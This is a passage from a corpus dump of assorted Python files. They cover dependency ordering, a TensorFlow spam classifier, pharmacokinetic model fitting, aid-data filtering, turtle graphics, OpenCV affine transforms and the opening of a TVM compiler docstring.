graph.add_edge(first, second)\n\n for project in projects:\n graph.get_or_create_node(project)\n\n return graph\n\n\ndef order_projects(projects):\n order = [None] * len(projects)\n\n end_of_list = add_non_dependent(order, projects, 0)\n to_be_processed = 0\n\n while to_be_processed < len(order):\n current = order[to_be_processed]\n\n if current is None:\n return\n\n for child in current.children:\n child.dependencies -= 1\n\n end_of_list = add_non_dependent(order, current.children, end_of_list)\n to_be_processed += 1\n\n return order\n\n\ndef add_non_dependent(order, projects, offset):\n for project in projects:\n if project.dependencies == 0:\n order[offset] = project\n offset += 1\n return offset\n\n\ndef order_projects_dfs(projects):\n stack = []\n\n for project in projects:\n # Project in empty state\n if project.state is None:\n if not dfs(project, stack):\n return\n\n return stack\n\n\ndef dfs(project, stack):\n # Cycle found\n if project.state == \"visiting\":\n return False\n\n if project.state is None:\n project.state = \"visiting\"\n\n for child in project.children:\n if not dfs(child, stack):\n return False\n\n project.state = \"complete\"\n stack.append(project)\n\n return True\n\n\nif __name__ == \"__main__\":\n projects = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n dependencies = [(\"a\", \"d\"), (\"f\", \"b\"), (\"b\", \"d\"), (\"f\", \"a\"), (\"d\", \"c\")]\n\n print(solution(projects, dependencies))\n print(dfs_solution(projects, dependencies))\n","sub_path":"python/trees_graphs/question_4_7.py","file_name":"question_4_7.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"646091668","text":"# coding=utf-8\n\"\"\"Web-based tests for accessability of GET-able web pages.\"\"\"\nfrom ..common.apiphanytestcase import ApiphanyTestCase\n\nclass StatusTests(ApiphanyTestCase):\n def testStatus(self):\n test_client = self.make_test_client()\n rv = test_client.get('/status')\n\n self.assertEqual(rv.status_code, 200)","sub_path":"test/web/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"510477650","text":"#!/usr/bin/env python\n\n# -*- encoding: utf-8 -*-\n\n'''\n@Author : {lif54334}\n\n@Software: PyCharm\n\n@File : oa_data.py\n\n@Time : 2018/11/23 17:59\n\n@Desc :\n\n'''\nimport numpy as np\n\ndef rank(x):\n y = sorted(x)\n num = list()\n for i in y:\n out = x.index(i) + 1\n print(out)\n num.append(out)\n print(num)\n return num\n\nx = [2, 1, 4, 5, 7, 3, 6]\nresult = rank(x)","sub_path":"machine_learning/ml/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"238982525","text":"class Solution1:\n def searchInsert(self, nums, target):\n numsLen = len(nums)\n i = 0\n while i < numsLen:\n if nums[i] == target:\n return i\n elif nums[i] < target:\n i += 1\n else:\n return i\n if i == numsLen:\n return numsLen\n\ns = Solution1()\nnums = [1,3,5,6]\ntargetArr = [5,2,7,0]\nfor i in targetArr:\n print(s.searchInsert(nums,i))","sub_path":"src/session1/q035_search_insert_position/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"252952105","text":"#!/usr/bin/env python\n\nfrom context import fossil_fuel\n\n# Limit the fields that are returned\n# props = ['Name', 'CustomerKey']\n\n# Filter the list of data extenions to retrieve\n# Match DE name precisely\nsearch_filter = {'Property': 'Name',\n 'SimpleOperator': 'like',\n 'Value': 'jpdev'}\n# Find DE's containing a string, use 'like' as the SimpleOperator\n\nprint('Retrieving Emails {}'.format(''))\nresults = fossil_fuel.et_email(action='get', search_filter=search_filter)\nprint(results)\n","sub_path":"example/email_retrieve.py","file_name":"email_retrieve.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"131541089","text":"import numpy as np\nimport tensorflow as tf\nimport random\n\nmax_sequence_length = 25\nmin_word_requency = 0\n# 每个词对应的向量的长度\nembedding_size = 50\n\n\ndef loadData(filePath):\n labels = []\n mail_data = []\n fr = open(filePath)\n lines = fr.readlines()\n for line in lines:\n line = line.strip()\n line = line.split('\\t')\n labels.append(line[0])\n mail_data.append(line[1])\n\n labels = [0 if i== 'ham' else 1 for i in labels ]\n return labels,mail_data\n\n# x = np.load('./data/mail_x.npy')\n# print(x.shape)\n\ndef word2vec(mail_data):\n\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(max_sequence_length,min_word_requency)\n text_processed = np.array(list(vocab_processor.fit_transform(mail_data)))\n vocab_size = len(vocab_processor.vocabulary_)\n\n\n #生成每个词对应的向量\n embedding_mat = tf.Variable(tf.random_normal([vocab_size,50],-1.0,1.0))\n\n #生成每个句子的向量表示\n embedding_output = tf.nn.embedding_lookup(embedding_mat,text_processed)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n word_vec = sess.run(embedding_output)\n return word_vec,vocab_size\n\n\ndef cnn_func(x):\n # 最后一层输出的神经元个数\n output_layer = 1\n\n rnn_size = 256\n #初始化 rnn cell\n cell = tf.nn.rnn_cell.BasicRNNCell(rnn_size)\n\n #循环过程\n outputs, h = tf.nn.dynamic_rnn(cell,x,dtype=tf.float32)\n\n # 取最后一个状态,组建全连接\n W = tf.Variable(tf.truncated_normal([rnn_size, output_layer], stddev=0.1))\n b = tf.Variable(tf.constant(0.1, shape=[output_layer]))\n pred = tf.add(tf.matmul(h, W), b)\n return pred\n\n\ndef classifiy_rnn(mail_data,labels):\n\n #超参\n learning_rate = 0.0001\n trainPercent = 0.7\n\n\n trainStep = 2000\n\n mail_vec,vocab_size = word2vec(mail_data)\n labels = np.array(labels).reshape(-1, 1)\n num_sample = mail_vec.shape[0]\n\n index = [i for i in range(mail_vec.shape[0])]\n random.shuffle(index)\n\n trainIndex = index[:round(num_sample * trainPercent)]\n testIndex = index[round(num_sample * trainPercent):]\n\n trainSample = mail_vec[trainIndex,:,:]\n trainLabel = labels[trainIndex]\n testSample = mail_vec[testIndex,:,:]\n testLabel = labels[testIndex]\n\n xPlace = tf.placeholder(shape=[None,max_sequence_length,embedding_size],dtype=tf.float32,name='xPlace')\n labelPlace = tf.placeholder(shape=[None,1],dtype=tf.float32,name='labelPlace')\n\n pred = cnn_func(xPlace)\n\n accur = tf.reduce_mean(tf.cast(tf.equal(tf.round(tf.nn.sigmoid(pred)),labelPlace),tf.float32))\n\n\n loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labelPlace,logits=pred)\n\n myopt = tf.train.AdamOptimizer(learning_rate)\n\n trainProcess = myopt.minimize(loss,name='trainProcess')\n\n losses = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in range(trainStep):\n sess.run(trainProcess,feed_dict={xPlace:trainSample,labelPlace:trainLabel})\n curAcc = sess.run(accur,feed_dict={xPlace:testSample,labelPlace:testLabel})\n print(curAcc)\n\n\n\n\n\n\nif __name__ == '__main__':\n filePath = './data/mail'\n labels, mail_data = loadData(filePath)\n classifiy_rnn(mail_data,labels)\n","sub_path":"tensorflow/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"64492862","text":"# -*- coding: utf-8 -*-\n\n\nfrom __future__ import print_function\nfrom __future__ import division\nimport sys\nsys.path.append(\"/home/tammo/Dropbox/summer_14/programming\")\nimport matplotlib.pyplot as plt\nimport tammo_lib_new as tl\nfrom numpy import *\nfrom scipy import *\nimport pymc\nimport h5py\nimport cPickle as pickle\n\n\n\nOLD_PATH = '/home/tammo/Dropbox/Master_sync/programming/AIF_project/'\n\n\n# Load popave AIF from Jen\npopave_aif, popave_time = tl.popave_aif()\n\n# Load analytic approximation\nparms = np.load(OLD_PATH + 'AIF_model_parms_popave.npy')\nmodel_time = np.arange(0,360,1)\nmodel_aif = tl.create_model_AIF(parms, model_time)\n\n# Load parker AIF\nparker_aif = tl.parker_aif(time = popave_time/100) \n\n\n# calculate ctr curve\np1 = .3\np2 = .3\np3 = .3\ntrue_parms = [p1, p2, p3]\n\nctr_2CUM = tl.PKmodel([p1,p2,p3], model_time, model_aif, model='2CUM')\n\nctr_PFUM = tl.PKmodel([p1,p2,p3], model_time, model_aif, model='PFUM')\n\n\n#pylab.plot(model_time, ctr_measured, 'k-')\npylab.plot(model_time, ctr_2CUM, 'r--')\npylab.plot(model_time, ctr_PFUM, 'b--')\nplt.show()\n\nM = 100 # iterations\n\nN = 10 # number of ctr curves\n\nmean_percentage_error_weighted = zeros(N)\nmean_percentage_error_2CUM = zeros(N)\nmean_percentage_error_PFUM = zeros(N)\n\nfor j in xrange(M):\n print(j)\n \n percentage_error_weigthed = zeros(N)\n percentage_error_PFUM = zeros(N)\n percentage_error_2CUM = zeros(N)\n \n for i in xrange(N):\n \n # Calculated mixed signal\n weight_step = 1/N\n A = i*weight_step\n B = 1-A\n ctr = (B * ctr_2CUM + A * ctr_PFUM )\n \n # add white noise\n SNR = 20\n noise_std = ctr.mean() / SNR\n ctr_measured = ctr + random.normal(loc=0, scale=noise_std, size=len(model_aif))\n \n ### CLASSIC FIT\n fit_parms_PFUM, rsquared, AIC_PFUM, BIC, ss_err_PFUM, fit_PFUM = tl.PKfit(model_aif,\\\n ctr_measured,\\\n model_time,\\\n model = 'PFUM',\\\n initial_parms = true_parms,\n method = 'leastsq',\\\n bounds=[(1e-6,1),(1e-6,4),(1e-6,1)])\n \n \n \n fit_parms_2CUM, rsquared, AIC_2CUM, BIC, ss_err_2CUM, fit_2CUM = tl.PKfit(model_aif,\\\n ctr_measured,\\\n model_time,\\\n model = '2CUM',\\\n initial_parms = true_parms,\n method = 'leastsq',\\\n bounds=[(1e-6,1),(1e-6,4),(1e-6,1)])\n \n AIC_weight_PFUM, AIC_weight_2CUM = tl.AIC_weights([AIC_PFUM, AIC_2CUM])\n weighted_parms = AIC_weight_PFUM * fit_parms_PFUM + AIC_weight_2CUM * fit_parms_2CUM\n \n percentage_error_PFUM_vec = (fit_parms_PFUM - true_parms) / true_parms\n percentage_error_2CUM_vec = (fit_parms_2CUM - true_parms) / true_parms\n percentage_error_weighted_vec = (weighted_parms - true_parms) / true_parms\n \n percentage_error_PFUM[i] = abs(mean(percentage_error_PFUM_vec))\n percentage_error_2CUM[i] = abs(mean(percentage_error_2CUM_vec))\n percentage_error_weigthed[i] = abs(mean(percentage_error_weighted_vec))\n \n \n mean_percentage_error_weighted += percentage_error_weigthed\n mean_percentage_error_PFUM += percentage_error_PFUM\n mean_percentage_error_2CUM += percentage_error_2CUM\n \n\nmean_percentage_error_weighted /= M\nmean_percentage_error_PFUM /= M\nmean_percentage_error_2CUM /= M\n\nplt.plot(mean_percentage_error_weighted, 'r')\nplt.plot(mean_percentage_error_2CUM, 'k')\nplt.plot(mean_percentage_error_PFUM, 'b')\n\n\nraise SystemExit\n\n\nplt.plot(model_time, fit_PFUM,'b')\nplt.plot(model_time, fit_2CUM,'r')\nplt.plot(model_time, ctr_measured,'k.',alpha=.4)\n\n\nprint('AIC Scores are: ', AIC_PFUM, AIC_2CUM,\n '\\nAIC weights are: ', tl.AIC_weights([AIC_PFUM,AIC_2CUM]),\n '\\nActual weights are: ', A, '\\t', B,\n '\\nFit parms are: ', fit_parms_PFUM, fit_parms_2CUM,\n '\\nTrue parms are: .4, .3, .35')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n### MCMCM STUFF\n\n\n# define modell for MCMC\nclass modell_2CUM():\n p1 = pymc.Uniform('p1', lower = 0, upper = 1)\n p2 = pymc.Uniform('p2', lower = 0, upper = 3)\n p3 = pymc.Uniform('p3', lower = 0, upper = 1)\n\n @pymc.deterministic(plot=False)\n def das_modell(p1=p1, p2=p2, p3=p3):\n # return p1 + p1*p2\n #return tl.dummy(p1,p2,x=model_time)\n return tl.PKmodel([p1,p2,p3], model_time, model_aif, model='2CUM')\n \n snr = pymc.Normal('snr',mu=0, tau=1 / (noise_std**2))\n \n signal = pymc.Normal('signal', mu=das_modell, tau=snr**(-2), \n value=ctr_measured,\n observed=True)\n \nclass modell_PFUM():\n p1 = pymc.Uniform('p1', lower = 0, upper = 1)\n p2 = pymc.Uniform('p2', lower = 0, upper = 3)\n p3 = pymc.Uniform('p3', lower = 0, upper = 1)\n\n @pymc.deterministic(plot=False)\n def das_modell(p1=p1, p2=p2, p3=p3):\n # return p1 + p1*p2\n #return tl.dummy(p1,p2,x=model_time)\n return tl.PKmodel([p1,p2,p3], model_time, model_aif, model='PFUM')\n \n snr = pymc.Normal('snr',mu=0, tau=1 / (noise_std**2))\n \n signal = pymc.Normal('signal', mu=das_modell, tau=snr**(-2), \n value=ctr_measured,\n observed=True)\n \n \n\nmod_2CUM = pymc.Model(modell_2CUM)\nmod_PFUM = pymc.Model(modell_PFUM)\n\nCM_fit = pymc.MAP(mod_2CUM)\nPM_fit = pymc.MAP(mod_PFUM)\n\nCM_fit.fit()\nPM_fit.fit()\n\nplt.figure()\nplt.plot(PM_fit.das_modell.get_value(),'b--')\nplt.plot(CM_fit.das_modell.get_value(),'r--')\nplt.plot(ctr_measured,'k.',alpha=.2)\nplt.show()\n\nprint(PM_fit.p1.value, PM_fit.p2.value, PM_fit.p3.value)\nprint(CM_fit.p1.value, CM_fit.p2.value, CM_fit.p3.value)\n\nprint('AIC Scores are: ', CM_fit.AIC, PM_fit.AIC,\n '\\nAIC weights are: ', tl.AIC_weights([CM_fit.AIC,PM_fit.AIC]),\n '\\nActual weights are: ', A, '\\t', B)\n\n\n#traditional = pymc.MAP(mod)\n#traditional.fit()\n#\n\n#chain_PFUM = pymc.MCMC(mod_PFUM, db='hdf5', dbname='chain3.hdf5')\n#chain_2CUM = pymc.MCMC(mod_2CUM, db='hdf5', dbname='chain3.hdf5')\n\n#chain.use_step_method(pymc.AdaptiveMetropolis, [TWOCUM.p1,TWOCUM.p2,TWOCUM.p3,TWOCUM.p4])\n\nraise SystemExit\nchain.sample(1e7, burn=0, thin=500)\n\n\n\n\n\n\n\n#plt.figure()\n#plt.plot(model_time,ctr_measured,'x',alpha=1)\n\n#plt.plot(model_time,ctr,'k--')\n\n# plot selection fitted curves\n#for i in arange(0,len(chain.das_modell.trace()),len(chain.das_modell.trace())/10):\n# plt.plot(model_time,chain.das_modell.trace()[:][i,:],alpha=.05)\n \np1_fit = chain.p1.trace[-1]\np2_fit = chain.p2.trace[-1]\np3_fit = chain.p3.trace[-1]\np4_fit = chain.p4.trace[-1]\n\n#p1_fit_trad = traditional.p1.value[0]\n#p2_fit_trad = traditional.p2.value[0]\n#p3_fit_trad = traditional.p3.value[0]\n#p4_fit_trad = traditional.p4.value[0]\n\n\n\n\nctr_fit = tl.PKmodel([p1_fit, p2_fit, p3_fit, p4_fit],\\\n model_time, model_aif, model='2CXM')\n\n#ctr_fit_trad = tl.PKmodel([p1_fit_trad, p2_fit_trad, p3_fit_trad, p4_fit_trad],\\\n# model_time, model_aif, model='2CXM')\n\n#print(p1_fit_trad, p1_fit, p1)\n#print(p2_fit_trad, p2_fit, p2)\n#print(p3_fit_trad, p3_fit, p3)\n#print(p4_fit_trad, p4_fit, p4)\n\n\nplt.figure()\nplt.plot(model_time, ctr_measured)\n#plt.plot(model_time, ctr_fit_trad)\nplt.plot(model_time, ctr_fit)\n#plot(model_time, ctr)\n\n#plt.figure()\n#plt.plot(ctr-ctr_fit_trad)\n\n\n\n\npymc.Matplot.plot(chain.p1)\npymc.Matplot.plot(chain.p2)\npymc.Matplot.plot(chain.p3)\npymc.Matplot.plot(chain.p4)\npymc.Matplot.plot(chain.snr)\n\n\n#pickle.dump(chain, open('/home/tammo/Dropbox/summer_14/programming/chain2.p', 'wb'))","sub_path":"PyMc/model_unmixing/model_unmixing.py","file_name":"model_unmixing.py","file_ext":"py","file_size_in_byte":7888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"67304871","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 3 10:22:31 2019\n\n@author: Matthew Wolf\n\"\"\"\nimport pandas as pd\n\ndef data_setup():\n \n \"\"\"======================================\n This function loads and cleans IATI data from eight donors in preparation for \n ANDE Methodology testing. This includes renaming the donors in the data, \n deleting some incomplete rows of WBG data, and filling in blanks\n ======================================\"\"\"\n \n import pandas as pd\n \n # list of fields we to keep\n iati_fields = ['iati-identifier','reporting-org','default-language', 'title','description','start-planned','end-planned',\\\n 'start-actual', 'end-actual','recipient-country-code','recipient-country', 'recipient-country-percentage',\\\n 'sector','sector-code', 'sector-percentage','sector-vocabulary','sector-vocabulary-code', 'default-currency',\\\n 'total-Commitment','total-Disbursement','total-Expenditure']\n \n # list of fields to import as datetimes\n date_fields = ['start-planned','end-planned','start-actual','end-actual']\n \n # dictionary of default NaN values for each of these columns\n field_nas = {'iati-identifier':\"\",'reporting-org':\"\",'default-language':\"\", 'title':\"\",'description':\"\",'start-planned':\"\",'end-planned':\"\",\\\n 'start-actual':\"\", 'end-actual':\"\",'recipient-country-code':\"\",'recipient-country':\"\", 'recipient-country-percentage':\"\",\\\n 'sector':\"\",'sector-code':\"\", 'sector-percentage':\"\",'sector-vocabulary':\"\",'sector-vocabulary-code':\"\", 'default-currency':\"\",\\\n 'total-Commitment':0,'total-Disbursement':0,'total-Expenditure':0}\n \n # locally saved CSV files for each of the eight donors\n #TODO - convert these read_csv calls to one or several IATI API call(s)\n wbg_raw = pd.read_csv('WBG_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n dfid_raw = pd.read_csv('DFID_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n sida_raw = pd.read_csv('SIDA_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n bmgf_raw = pd.read_csv('BMGF_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n devco_raw = pd.read_csv('DEVCO_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n gac_raw = pd.read_csv('GAC_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n gf_raw = pd.read_csv('Global_Fund_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n MFANe_raw = pd.read_csv('MFA_Netherlands_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n \n #concatenate the data from each donor\n dfs = [wbg_raw, dfid_raw, sida_raw, bmgf_raw, devco_raw, dfid_raw, gac_raw, gf_raw, MFANe_raw]\n data = pd.concat(dfs, ignore_index=True, sort=False)\n \n #Change names of reporting-orgs to donor shortnames for simplicity\n data.loc[data['reporting-org'] == 'Sweden', 'reporting-org'] = 'Sida'\n data.loc[data['reporting-org'] == 'Department for International Development', 'reporting-org'] = 'DFID'\n data.loc[data['reporting-org'] == 'European Commission - Development and Cooperation-EuropeAid', 'reporting-org'] = 'DEVCO'\n data.loc[data['reporting-org'] == 'Foreign Affairs, Trade and Development Canada (DFATD)', 'reporting-org'] = 'GAC'\n data.loc[data['reporting-org'] == 'Ministry of Foreign Affairs (DGIS)', 'reporting-org'] = 'MFA Netherlands'\n data.loc[data['reporting-org'] == 'The Global Fund to Fight AIDS, Tuberculosis and Malaria', 'reporting-org'] = 'Global Fund'\n data.loc[data['reporting-org'] == 'Bill and Melinda Gates Foundation', 'reporting-org'] = 'B&MGF'\n \n #WB IATI data contains 30 random rows with incomplete data and a 'World Bank Group' reporting-org\n data.drop(data[data['reporting-org'] == 'World Bank Group'].index, inplace=True)\n \n # if there's no sector-vocabulary and no sector-vocabulary-code, drop the row\n #TODO - keep all dropped rows for later analysis in a dictionary {drop-logic: dropped df}\n #data.drop(data[(data['sector-vocabulary'].isnull()) & (data['sector-vocabulary-code'].isnull())].index, inplace=True)\n \n #fill in using the dict specified above\n data.fillna(value=field_nas)\n \n data = data.reset_index()\n del data['index']\n \n return data\n \ndef data_sectors(data, sectors):\n \n \"\"\"======================================\n This function takes a list of strings, each representing a IATI sector-code\n from any sector vocabulary. It filters the data and keeps any rows that are\n tagged with these sectors\n ======================================\"\"\"\n \n import pandas as pd\n results = pd.DataFrame()\n for sector in sectors:\n #for i in data.index:\n # print(sector + \" in \" + str(data.at[i,'sector-code']) + \" ?\")\n # print(sector in str(data.at[i,'sector-code']))\n temp = data[data['sector-code'].astype('str').str.contains(sector, na=False)]\n results = pd.concat([results, temp], ignore_index=True, sort=False)\n\n return results\n \ndef data_keywords(data, keywords): \n \n \"\"\"======================================\n This function takes a list of strings, each representing a text keyword in\n ALL LOWERCASE text. It filters the data by checking the title and description\n of each row for each keyword, keeping any rows where are least one keyword.\n ======================================\"\"\"\n \n import pandas as pd\n results = pd.DataFrame()\n for keyword in keywords:\n temp = data[(data['title'].str.lower().str.contains(keyword, na=False)) &\\\n (data['description'].str.lower().str.contains(keyword, na=False))]\n results = pd.concat([results, temp], ignore_index=True, sort=False)\n \n return results\n\ndef data_dates(data, startdate, enddate):\n pass\n\n \n\n# =============================================================================\n# def data_psa_tag(data, psa_dict):\n# \n# import pandas as pd\n# results = pd.DataFrame\n# =============================================================================\n\ndef data_investigate(data, sectors, keywords):\n \n \"\"\"======================================\n This function runs some diagnostic tests, for certain data, sectors, and\n keywords inputs. It shows how large the original dataset is, and its \n breakdown by # of rows and sum of total funding commitments by donor, and\n shows this same breakdown again for the data after:\n 1. Applying just the sector filter\n 2. Applying just the keyword filter\n 3. Inner joining the sector-filtered and keyword-filtered data\n 4. Outer joining the sector-filtered and keyword-filtered data\n ======================================\"\"\"\n \n sectors_data = data_sectors(data, sectors)\n keywords_data = data_keywords(data, keywords)\n inner = pd.merge(sectors_data, keywords_data, how=\"inner\")\n outer = pd.merge(sectors_data, keywords_data, how=\"outer\")\n \n def print_stats(df):\n print(\"Rows : \" + str(df.shape[0]))\n print(\"Columns: \" + str(df.shape[1]) + \"\\n\")\n print(\"Rows per donor: \")\n print(df.groupby(['reporting-org'])['iati-identifier'].count())\n print()\n print(\"Commitments per donor: \")\n print(df.groupby(['reporting-org'])['total-Commitment'].sum())\n print()\n \n print(\"1. FOR FULL DATA SET:\")\n print_stats(data)\n print(\"2. FOR SECTOR-FILTERED DATA:\")\n print_stats(sectors_data)\n print(\"3. FOR KEYWORD-FILTERED DATA:\")\n print_stats(keywords_data)\n print(\"4. FOR INNER JOIN OF SECTOR/KEYWORD-FILTERED DATA:\")\n print_stats(inner)\n print(\"5. FOR OUTER JOIN OF SECTOR/KEYWORD-FILTERED DATA:\")\n print_stats(outer)\n \n\nsectors = ['13010', '13020', '13030', '13040', '13081'] \nkeywords = [\"reproductive\", \"family planning\", \"contraceptive\", \"abortion\", \\\n \"pregnancy\", \"sexual\", \"gender-based violence\", \"domestic violence\",\\\n \"female genital mutilation\", \"fgm\", \"population census\", \"hiv\", \"std\",\\\n \"aids\", \"obstetric\", \"antenatal\", \"perinatal\",\"neonatal\", \"postnatal\",\\\n \"newborn\", \"health personnel\", \"childhood\", \"immunization\", \"polio\",\\\n \"measles\", \"tetanus\", \"congenital\",\"disabilities\", \"breastfeeding\"\\\n \"infant feeding\", \"doctor\", \"nurse\", \"midwive\", \"pharmacist\", \\\n \"community health worker\", \"health specialists\", \"medical device\",\\\n \"m-Health\", \"e-Health\", \"mobile health\",\"health data\", \"medical products\"\\\n \"health products\", \"medical services\", \"health services\", \"clinical studies\"\\\n \"clinical trials\", \"medicine\", \"vaccine\"]\n","sub_path":"data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":9004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"115595975","text":"''' turtle_Tk_Canvas_Image_url.py\ndisplay a GIF image obtained from an internet web page\non a Tkinter canvas, then use the canvas for some turtle drawing\nmodified Vegaseat code\n'''\nimport io\nimport base64\nimport turtle\ntry:\n # Python2\n import Tkinter as tk\n from urllib2 import urlopen\nexcept ImportError:\n # Python3\n import tkinter as tk\n from urllib.request import urlopen\nroot = tk.Tk()\nroot.title(\"turtle graphics a website image\")\n# this GIF picture previously downloaded to tinypic.com\nimage_url = \"http://i46.tinypic.com/r9oh0j.gif\"\nimage_byt = urlopen(image_url).read()\nimage_b64 = base64.encodestring(image_byt)\nphoto = tk.PhotoImage(data=image_b64)\n\n# create a white canvas large enough to fit the image+\nw = 540\nh = 340\ncv = tk.Canvas(bg='white', width=w, height=h)\ncv.pack()\n# this makes the canvas a turtle canvas\n# point(0, 0) is in the center now\ntu = turtle.RawTurtle(cv)\n# put the image on the turtle canvas with\n# create_image(xpos, ypos, image, anchor)\nxpos = int(w/2 * 0.9)\nypos = int(h/2 * 0.9)\nprint(xpos, ypos)\ncv.create_image(-xpos, -ypos, image=photo, anchor='nw')\n# now do some turtle graphics\ntu.pensize(2)\nfor radius in range(50, 200, 40):\n # pen up\n tu.up()\n # move pen to point x, y\n # keeps the center of the circle at canvas center\n tu.goto(0, -radius)\n # pen down\n tu.down()\n tu.circle(radius)\nroot.mainloop()\n","sub_path":"exemplos-em-python3/download-image-web.py","file_name":"download-image-web.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"416549295","text":"\nfname = input('Enter file name:')\ncount = 0\ntry:\n fhand = open(fname)\nexcept:\n print('File name cannot be oppened:', fname)\n exit()\nfor line in fhand:\n print(line.upper().strip())\n count = count+1\nprint(count)\n","sub_path":"py_upper.py","file_name":"py_upper.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"523688838","text":"import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport math \ndef oper(M,img,hei,wei):\n h,w,c=img.shape\n img_out=np.zeros((hei,wei,c),np.uint8)\n #img_out=np.zeros((h,w,c),np.uint8)\n iden=np.array([[M[1][1],M[1][0]],[M[0][1],M[0][0]]])\n B=np.array([[M[1][2]],[M[0][2]]])\n for i in range(h):\n for j in range(w):\n vector=np.array([[i],[j]])\n aux=img[i][j]\n res=np.dot(iden,vector)+B\n res=res.astype(int)\n if(res[0][0]=0):\n if(res[1][0]=0):\n img_out[res[0][0]][res[1][0]]=aux\n if(iden[0][1]==0 and iden[1][0]==0):\n if(iden[1][1]>1):\n if(iden[0][0]<=1):\n for j in range(0,img_out.shape[0]):\n aux=img_out[j][0]\n for i in range(0,img_out.shape[1]):\n if(i%int(iden[1][1])==0):\n aux=img_out[j][i]\n else:\n img_out[j][i]=aux;\n else:\n for j in range(0,img_out.shape[0],int(iden[0][0])):\n aux=img_out[j][0]\n for i in range(0,img_out.shape[1]):\n if(i%int(iden[1][1])==0):\n aux=img_out[j][i]\n else:\n img_out[j][i]=aux;\n if(iden[0][0]>1):\n for j in range(0,img_out.shape[1]):\n aux=img_out[0][j]\n for i in range(0,img_out.shape[0]):\n if(i%int(iden[0][0])==0):\n aux=img_out[i][j]\n else:\n img_out[i][j]=aux;\n\n return img_out\n\n'''\n#Esala\n\nimg= cv2.imread('jesse.jpg')\nf,c,x=img.shape\nM=np.array([[2,0,0],[0,0.5,0]])\nres = oper(M,img,int(f/2),int(c*2))\ndst=cv2.warpAffine(img, M, (c*2, int(f/2)))\n#Warpaffine\ncv2.imshow('escalecv.jpg',dst)\n#Función propia\ncv2.imshow('miescale.jpg',res)\n'''\n\n\n'''\n#Translate\nimg= cv2.imread('jesse.jpg')\nf,c,x=img.shape\nM=np.float32([[1,0,100],[0,1,100]])\nres = oper(M,img,f,c)\ndst=cv2.warpAffine(img, M, (c, f))\n#Warpaffine\ncv2.imshow('traslacv.jpg',dst)\n#Función propia\ncv2.imshow('mitrasla.jpg',res)\n'''\n\n\n'''\n#ROTACION\nimg= cv2.imread('jesse.jpg')\nangu=math.radians(45)\nf,c,x=img.shape\nM=np.array([[math.cos(angu), math.sin(angu), (1 - math.cos(angu)) * c/2 - math.sin(angu) * f/2], [-math.sin(angu), math.cos(angu), math.sin(angu) * c/2 + (1 - math.sin(angu)) * f/2]])\nres = oper(M,img,f,c)\ncv2.imshow('mirota.jpg',res);\nM2 = np.float32([[math.cos(angu), math.sin(angu), (1 - math.cos(angu)) * c/2 - math.sin(angu) * f/2], [-math.sin(angu), math.cos(angu), math.sin(angu) * c/2 + (1 - math.sin(angu)) * f/2]])\ncv2.imshow('cv_rotate.jpg',cv2.warpAffine(img, M2, (c, f)))\n'''\n'''\n#Shear\n\nimg= cv2.imread('jesse.jpg')\nf,c,x=img.shape\nM = np.float32([[1,-0.6,0],[-0.1,1,0]])\nres = oper(M,img,f,c)\ndst=cv2.warpAffine(img, M, (c, f))\n#Warpaffine\ncv2.imshow('mishear.jpg',dst)\n#Función propia\ncv2.imshow('shear_cv.jpg',res)\n'''\n","sub_path":"singleselection (1).py","file_name":"singleselection (1).py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"524805770","text":"\"\"\"\nA compiler from a Relay expression to TVM's graph runtime.\n\nThe compiler is built from a few pieces.\n\nFirst we define a compiler from a single Relay expression to the\ngraph langauge. We require the expression to be a function.\nThe function's parameters correpond to the placeholder/inputs\nand model parameters found in the computation graph representation.\nThe body of the function represents the computation graph.\n\nThe compiler's output is a program in the graph language, which is composed of\ngraph langauge is composed of Node, NodeRef, InputNode, OpNode.\nThis \"little language\" represents programs in 